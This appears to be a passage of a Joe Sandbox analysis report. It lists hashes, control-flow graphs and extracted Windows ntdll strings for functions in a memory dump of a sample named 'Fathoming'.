                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff195cba18970802d39174af56009a333c1f94507c043421b428f04d1577a7e2
                                          • Instruction ID: 1e466d61a7d7702e3f80c93129870cb840abd48406743149bc978c3dd58c0d75
                                          • Opcode Fuzzy Hash: ff195cba18970802d39174af56009a333c1f94507c043421b428f04d1577a7e2
                                          • Instruction Fuzzy Hash: 5F90023120180402D504B158485470B102557D0302F55C121A5168516DC62589627672
                                          Function 21B22FE0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a454582dfb280504ca69593c5bc5628f9dc862d2ac5368b4109fe7d2416b31da
                                          • Instruction ID: ee32cc2d1fa10bc29aea11840dd9edeb75534e5d74853abc21eb0e59fe46cdf9
                                          • Opcode Fuzzy Hash: a454582dfb280504ca69593c5bc5628f9dc862d2ac5368b4109fe7d2416b31da
                                          • Instruction Fuzzy Hash: E2900221211C0042D604B5684C54B07102557D0303F55C225A4158515CC91589726622
                                          Function 21B22F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 720463682ca429307d00860f732c27e410ab92b56543a0aaea93b615c070afd4
                                          • Instruction ID: 6c0b331867ca2ac7391de0321be452b493cf6b4c6936a9562e662798a77128fe
                                          • Opcode Fuzzy Hash: 720463682ca429307d00860f732c27e410ab92b56543a0aaea93b615c070afd4
                                          • Instruction Fuzzy Hash: B290026134140442D504B1584454B06102597E1301F55C125E5068515DC619CD637227
                                          Function 21B22F60 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47a5a9a1960164a76d9632500ef3627788058aa0fc6573e56b0ddefcfbd86100
                                          • Instruction ID: c9a4093979d292288294adb54c3b578f729545548c66ef9bd9cc1e04b630aa2c
                                          • Opcode Fuzzy Hash: 47a5a9a1960164a76d9632500ef3627788058aa0fc6573e56b0ddefcfbd86100
                                          • Instruction Fuzzy Hash: B990026121140042D508B1584444706106557E1201F55C122A6158515CC5298D726226
                                          Function 21B22EA0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac65b17dffae9265dd5fe9a747d989414190c758665f14c4e07a3fb4747c4ab4
                                          • Instruction ID: d006003f598dad94aacda8b7fca1d0059fdaca4590579f178d759d01af401468
                                          • Opcode Fuzzy Hash: ac65b17dffae9265dd5fe9a747d989414190c758665f14c4e07a3fb4747c4ab4
                                          • Instruction Fuzzy Hash: 3190027120140402D544B1584444746102557D0301F55C121A9068515EC6598EE67766
                                          Function 21B22E80 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 736dc35ba138981b9a48ab2f605141cb6df76a4d6f965f9180b4e9dd65a63412
                                          • Instruction ID: b65da52e3c13ba09f691221a1bb54d3ee8940012ae51133a86f0f50fe9a54275
                                          • Opcode Fuzzy Hash: 736dc35ba138981b9a48ab2f605141cb6df76a4d6f965f9180b4e9dd65a63412
                                          • Instruction Fuzzy Hash: 8A90022160140502D505B1584444616102A57D0241F95C132A5028516ECA258AA3B232
                                          Function 21B22EE0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 326d65ce3c928b3a5ff23fe0066e16de07deb691d13aebf7f16be499e5ec8cfd
                                          • Instruction ID: 4d9db01aaaf8dc5bc5258e4b320008d6ce7925977f7baa946d977093972b04d8
                                          • Opcode Fuzzy Hash: 326d65ce3c928b3a5ff23fe0066e16de07deb691d13aebf7f16be499e5ec8cfd
                                          • Instruction Fuzzy Hash: E290026120180403D544B5584844607102557D0302F55C121A6068516ECA298D627236
                                          Function 21B22E30 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: abe05e434398b5c32847b7b19d32f6d152dee6826b12c943daacd64990366c24
                                          • Instruction ID: b7c7188f2b59a7cd5786bd4b521f84746f5929c98ad32e6c8883dfd4055dcb43
                                          • Opcode Fuzzy Hash: abe05e434398b5c32847b7b19d32f6d152dee6826b12c943daacd64990366c24
                                          • Instruction Fuzzy Hash: F490022130140402D506B1584454606102997D1345F95C122E5428516DC6258A63B233
                                          Function 21B23090 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dba48a716389eeb0e0128dbf22f2461639fd001858515cef95ecec4fec9b976b
                                          • Instruction ID: 568d5217bb25670daf5f9918b283f57b1955f34c885a7b07fe4b194c6fe7b07d
                                          • Opcode Fuzzy Hash: dba48a716389eeb0e0128dbf22f2461639fd001858515cef95ecec4fec9b976b
                                          • Instruction Fuzzy Hash: 0F90022124140802D544B1588454707102697D0601F55C121A4028515DC6168A7677B2
                                          Function 21B23010 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 88191888c5219a852b0dd709f71c29f13f7c02154a93d52a9584458f8a546fd5
                                          • Instruction ID: d613846010f1fadc6d399aeb1fadc05b40ec07f2be986d6012ad2a6bd0246e7c
                                          • Opcode Fuzzy Hash: 88191888c5219a852b0dd709f71c29f13f7c02154a93d52a9584458f8a546fd5
                                          • Instruction Fuzzy Hash: 7A90022120184442D544B2584844B0F512557E1202F95C129A815A515CC91589666722
                                          Function 21B22C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: 50388966041d070498c645f20343a002beb6ba087acc5644c4ce33ae0abbf577
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:
                                          Function 21B22890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1127 21b22890-21b228b3 1128 21b5a4bc-21b5a4c0 1127->1128 1129 21b228b9-21b228cc 1127->1129 1128->1129 1130 21b5a4c6-21b5a4ca 1128->1130 1131 21b228ce-21b228d7 1129->1131 1132 21b228dd-21b228df 1129->1132 1130->1129 1133 21b5a4d0-21b5a4d4 1130->1133 1131->1132 1134 21b5a57e-21b5a585 1131->1134 1135 21b228e1-21b228e5 1132->1135 1133->1129 1136 21b5a4da-21b5a4de 1133->1136 1134->1132 1137 21b228eb-21b228fa 1135->1137 1138 21b22988-21b2298e 1135->1138 1136->1129 1142 21b5a4e4-21b5a4eb 1136->1142 1139 21b22900-21b22905 1137->1139 1140 21b5a58a-21b5a58d 1137->1140 1141 21b22908-21b2290c 1138->1141 1139->1141 1140->1141 1141->1135 1143 21b2290e-21b2291b 1141->1143 1144 21b5a564-21b5a56c 1142->1144 1145 21b5a4ed-21b5a4f4 1142->1145 1146 21b22921 1143->1146 1147 21b5a592-21b5a599 1143->1147 1144->1129 1148 21b5a572-21b5a576 1144->1148 1149 21b5a4f6-21b5a4fe 1145->1149 1150 21b5a50b 1145->1150 1151 21b22924-21b22926 1146->1151 1159 21b5a5a1-21b5a5c9 call 21b30050 1147->1159 1148->1129 1152 21b5a57c call 21b30050 1148->1152 1149->1129 1153 21b5a504-21b5a509 1149->1153 1154 21b5a510-21b5a536 call 21b30050 1150->1154 1156 21b22993-21b22995 1151->1156 1157 21b22928-21b2292a 1151->1157 1166 21b5a55d-21b5a55f 1152->1166 1153->1154 1154->1166 1156->1157 1161 21b22997-21b229b1 call 21b30050 1156->1161 1163 21b22946-21b22966 call 21b30050 1157->1163 1164 21b2292c-21b2292e 1157->1164 1176 21b22969-21b22974 1161->1176 1163->1176 1164->1163 1169 21b22930-21b22944 call 21b30050 1164->1169 1173 21b22981-21b22985 1166->1173 1169->1163 1176->1151 1178 21b22976-21b22979 1176->1178 1178->1159 1179 21b2297f 1178->1179 1179->1173
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: c7285f6f684be477571becb211970b1c13faf43952cc93ec28490de593630678
                                          • Instruction ID: 1f1cb7c271e358ff15875454440717a523d313032723092ebb413f28e260589d
                                          • Opcode Fuzzy Hash: c7285f6f684be477571becb211970b1c13faf43952cc93ec28490de593630678
                                          • Instruction Fuzzy Hash: 1D510BB6E005567FCB19DFA8889097EFBB8FF493407508269E458D7245D374DF1887A0
                                          Function 21B92410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1180 21b92410-21b92433 1181 21b92439-21b9243d 1180->1181 1182 21b924ec-21b924ff 1180->1182 1181->1182 1185 21b92443-21b92447 1181->1185 1183 21b92501-21b9250a 1182->1183 1184 21b92513-21b92515 1182->1184 1183->1184 1187 21b9250c 1183->1187 1188 21b92517-21b9251b 1184->1188 1185->1182 1186 21b9244d-21b92451 1185->1186 1186->1182 1189 21b92457-21b9245b 1186->1189 1187->1184 1190 21b92538-21b9253e 1188->1190 1191 21b9251d-21b9252c 1188->1191 1189->1182 1192 21b92461-21b92468 1189->1192 1195 21b92543-21b92547 1190->1195 1193 21b9252e-21b92536 1191->1193 1194 21b92540 1191->1194 1196 21b9246a-21b92471 1192->1196 1197 21b924b6-21b924be 1192->1197 1193->1195 1194->1195 1195->1188 1198 21b92549-21b92556 1195->1198 1199 21b92473-21b9247b 1196->1199 1200 21b92484 1196->1200 1197->1182 1203 21b924c0-21b924c4 1197->1203 1201 21b92558-21b92562 1198->1201 1202 21b92564 1198->1202 1199->1182 1204 21b9247d-21b92482 1199->1204 1205 21b92489-21b924ab call 21b30510 1200->1205 1206 21b92567-21b92569 1201->1206 1202->1206 1203->1182 1207 21b924c6-21b924ea call 21b30510 1203->1207 1204->1205 1218 21b924ae-21b924b1 1205->1218 1209 21b9256b-21b9256d 1206->1209 1210 21b9258d-21b9258f 1206->1210 1207->1218 1209->1210 1215 21b9256f-21b9258b call 21b30510 1209->1215 1212 21b925ae-21b925d0 call 21b30510 1210->1212 1213 21b92591-21b92593 1210->1213 1225 21b925d3-21b925df 1212->1225 1213->1212 1219 21b92595-21b925ab call 21b30510 1213->1219 1215->1225 1224 21b92615-21b92619 1218->1224 1219->1212 1225->1206 1227 21b925e1-21b925e4 1225->1227 1228 21b92613 1227->1228 1229 21b925e6-21b92610 call 21b30510 1227->1229 1228->1224 1229->1228
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 9f37bf60923823346770b7905ed37f672abcf9dff9234337753374079b969233
                                          • Instruction ID: f6973e34edce39fd7c46c03b1faf9c4caf7615bf242a10dddae75fb45ed13941
                                          • Opcode Fuzzy Hash: 9f37bf60923823346770b7905ed37f672abcf9dff9234337753374079b969233
                                          • Instruction Fuzzy Hash: B851F8B5E00645AFDB28CF9DC89097FBBF8EF49200B0084B9E596D7682D674DB418B60
                                          Function 21BBA670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1429 21bba670-21bba6e9 call 21af2410 * 2 RtlDebugPrintTimes 1435 21bba89f-21bba8c4 call 21af25b0 * 2 call 21b24c30 1429->1435 1436 21bba6ef-21bba6fa 1429->1436 1438 21bba6fc-21bba709 1436->1438 1439 21bba724 1436->1439 1442 21bba70b-21bba70d 1438->1442 1443 21bba70f-21bba715 1438->1443 1440 21bba728-21bba734 1439->1440 1446 21bba741-21bba743 1440->1446 1442->1443 1444 21bba71b-21bba722 1443->1444 1445 21bba7f3-21bba7f5 1443->1445 1444->1440 1449 21bba81f-21bba821 1445->1449 1450 21bba736-21bba73c 1446->1450 1451 21bba745-21bba747 1446->1451 1455 21bba827-21bba834 1449->1455 1456 21bba755-21bba77d RtlDebugPrintTimes 1449->1456 1453 21bba73e 1450->1453 1454 21bba74c-21bba750 1450->1454 1451->1449 1453->1446 1458 21bba86c-21bba86e 1454->1458 1459 21bba85a-21bba866 1455->1459 1460 21bba836-21bba843 1455->1460 1456->1435 1469 21bba783-21bba7a0 RtlDebugPrintTimes 1456->1469 1458->1449 1461 21bba87b-21bba87d 1459->1461 1463 21bba84b-21bba851 1460->1463 1464 21bba845-21bba849 1460->1464 1467 21bba87f-21bba881 1461->1467 1468 21bba870-21bba876 1461->1468 1465 21bba96b-21bba96d 1463->1465 1466 21bba857 1463->1466 1464->1463 1470 21bba883-21bba889 1465->1470 1466->1459 1467->1470 1471 21bba878 1468->1471 1472 21bba8c7-21bba8cb 1468->1472 1469->1435 1477 21bba7a6-21bba7cc RtlDebugPrintTimes 1469->1477 1474 21bba88b-21bba89d RtlDebugPrintTimes 1470->1474 1475 21bba8d0-21bba8f4 RtlDebugPrintTimes 1470->1475 1471->1461 1473 21bba99f-21bba9a1 1472->1473 1474->1435 1475->1435 1481 21bba8f6-21bba913 RtlDebugPrintTimes 1475->1481 1477->1435 1482 21bba7d2-21bba7d4 1477->1482 1481->1435 1489 21bba915-21bba944 RtlDebugPrintTimes 1481->1489 1483 21bba7f7-21bba80a 1482->1483 1484 21bba7d6-21bba7e3 1482->1484 1488 21bba817-21bba819 1483->1488 1486 21bba7eb-21bba7f1 1484->1486 1487 21bba7e5-21bba7e9 1484->1487 1486->1445 1486->1483 1487->1486 1490 21bba81b-21bba81d 1488->1490 1491 21bba80c-21bba812 1488->1491 1489->1435 1495 21bba94a-21bba94c 1489->1495 1490->1449 1492 21bba868-21bba86a 1491->1492 1493 21bba814 1491->1493 1492->1458 1493->1488 1496 21bba94e-21bba95b 1495->1496 1497 21bba972-21bba985 1495->1497 1499 21bba95d-21bba961 1496->1499 1500 21bba963-21bba969 1496->1500 1498 21bba992-21bba994 1497->1498 1501 21bba987-21bba98d 1498->1501 1502 21bba996 1498->1502 1499->1500 1500->1465 1500->1497 1503 21bba99b-21bba99d 1501->1503 1504 21bba98f 1501->1504 1502->1467 1503->1473 1504->1498
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: HEAP:
                                          • API String ID: 3446177414-2466845122
                                          • Opcode ID: e1ab84d796b82166710279783146144535b0fd9c10be2c329a724b474b2656b7
                                          • Instruction ID: 1a3cd23228f2ef74631cb1a7239d4ce0d325d38f6ff441dbd44af43156b294b3
                                          • Opcode Fuzzy Hash: e1ab84d796b82166710279783146144535b0fd9c10be2c329a724b474b2656b7
                                          • Instruction Fuzzy Hash: D5A18B75A042128FD709CE28C890A2ABBF5FF8A350F15456DED46DB721E770EE06CB91
                                          Function 21AFA250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                          Download Yara Rule
                                          Strings
                                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 21B47AE6
                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 21B479D0, 21B479F5
                                          • SsHd, xrefs: 21AFA3E4
                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 21B479FA
                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 21B479D5
                                          • Actx , xrefs: 21B47A0C, 21B47A73
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                          • API String ID: 0-1988757188
                                          • Opcode ID: 266c58dc5acd408780093b40d8c9fa8098aae1fa2c9aff4075a7370a29b7aaec
                                          • Instruction ID: 056316a50d77208a1ea9c4c410480d7b1e00d99c62e49e8d29976313d6154ceb
                                          • Opcode Fuzzy Hash: 266c58dc5acd408780093b40d8c9fa8098aae1fa2c9aff4075a7370a29b7aaec
                                          • Instruction Fuzzy Hash: 93E1D270A043428FD715CF24C894B9ABBF5FB85354F144A2DF9A6CB2A1D732DA45CB82
                                          Function 21B8F525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                          • API String ID: 3446177414-1745908468
                                          • Opcode ID: ca2cd5921ad549f00e15ea9d41b6d3f200654675ba01553832b574172d6a9902
                                          • Instruction ID: 1092b08778b6edb6e3ba167f4e2a84a157e6f55d71f762b2353dc0335fbd881e
                                          • Opcode Fuzzy Hash: ca2cd5921ad549f00e15ea9d41b6d3f200654675ba01553832b574172d6a9902
                                          • Instruction Fuzzy Hash: 75912532A01A82DFDB0ACF74C484A9EBBF1FF5AB14F16815DE544AB261DB35D940CB10
                                          Function 21AD65B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 21B39AB4
                                          • LdrpLoadShimEngine, xrefs: 21B39ABB, 21B39AFC
                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 21B39AF6
                                          • minkernel\ntdll\ldrinit.c, xrefs: 21B39AC5, 21B39B06
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
                                          • Associated: 00000008.00000002.3003389352.0000000021BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.3003389352.0000000021C4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_21ab0000_Fathoming.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 3446177414-3589223738
                                          • Opcode ID: 5f04e7a531405e617e28d3b994bbee29af754612392fecb182cdd53115862d7d
                                          • Instruction ID: a1ecb6012498266b5b06bd7e97bc3343653635bb4de6c15c9b6fff255a26486a
                                          • Opcode Fuzzy Hash: 5f04e7a531405e617e28d3b994bbee29af754612392fecb182cdd53115862d7d
                                          • Instruction Fuzzy Hash: C551E172A402599FDB0CDF6CC8A4EDD7BB6BF99304F05012AE954EB29ADB649C40C790
                                          Function 21B8F157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • ---------------------------------------, xrefs: 21B8F279
                                          • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 21B8F263
                                          • HEAP: , xrefs: 21B8F15D
                                          • Entry Heap Size , xrefs: 21B8F26D
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.3003389352.0000000021AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 21AB0000, based on PE: true
